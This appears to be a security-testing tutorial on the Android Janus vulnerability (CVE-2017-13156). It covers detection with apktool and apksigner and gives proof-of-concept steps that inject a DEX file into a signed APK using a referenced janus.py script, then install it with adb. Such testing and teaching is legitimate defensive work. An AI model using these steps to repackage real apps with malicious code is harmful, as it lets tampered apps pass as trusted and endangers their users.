Skip to main content

Exploiting App Vulnerable To Janus (CVE-2017-13156)

A serious vulnerability in Android allows attackers to inject a malicious DEX (Dalvik Executable) file into an APK without affecting the code signatures. This attack was named Janus, after the Roman god of duality.

  • Applications that support Android 5.0 – 8.0 AND use version 1 only of the code signing schemes are vulnerable to this attack.
  • Applications that support Android 5.0 – 7.0 AND are signed with version 1 and version 2 and/or version 3 of the code signing schemes are vulnerable to this attack.

Detection

To test if an application is vulnerable to this attack:

  • Decode the app using apktool
    • apktool d -o App base.apk
  • Check the minimum SDK version for the app
    • cat App/apktool.yml | grep minSdkVersion
    • If the minSdkVersion lands on 21 through (and including) 26, then continue. Otherwise, the app is not vulnerable and there is no need to continue the checks.
  • Check the signing scheme(s) in use
    • apksigner verify --verbose base.apk
    • Verify if v1 scheme is in use.
    • If v2 and/or v3 are also in use, validate the minSdkVersion is 21 through 24. Only Android 5.0 – 7.0 are vulnerable if v2/v3 is also in use!

Proof Of Concept Exploit

Ideally, a real malicious DEX file would be created and injected into the APK. For our purposes, we can simply take any DEX file and inject it. If the APK file will install and function normally, we can assume that the exploit is working.

  • The first thing you need to get is a DEX file to inject into the app. Since we aren’t concerned with malicious behavior, we can use any DEX file (or compile a new one). The easiest way is to just grab another apps’ APK and pull out one if its classes.dex files.
    • apktool -s d -o App base.apk && cp App/classes.dex .
  • Obtain the hash of the code signature
    • apksigner verify --print-certs app.apk
  • Use the janus.py script to inject the classes.dex file into the test app
    • python janus.py classes.dex app.apk app-injected.apk
    • Usage: janus.py {file to inject} {original APK} {injected APK}
  • Once the file is injected, verify the hash of the code signature is the same as it was before
    • apksigner verify --print-certs app.apk
  • Install the app on to your device
    • adb install app-injected.apk
  • Launch the app, and use it as you normally would

References

https://medium.com/mobis3c/exploiting-apps-vulnerable-to-janus-cve-2017-13156-8d52c983b4e0

https://packetstormsecurity.com/files/155189/Android-Janus-APK-Signature-Bypass.html

https://github.com/giacomoferretti/janus-toolkit/blob/master/python3/janus.py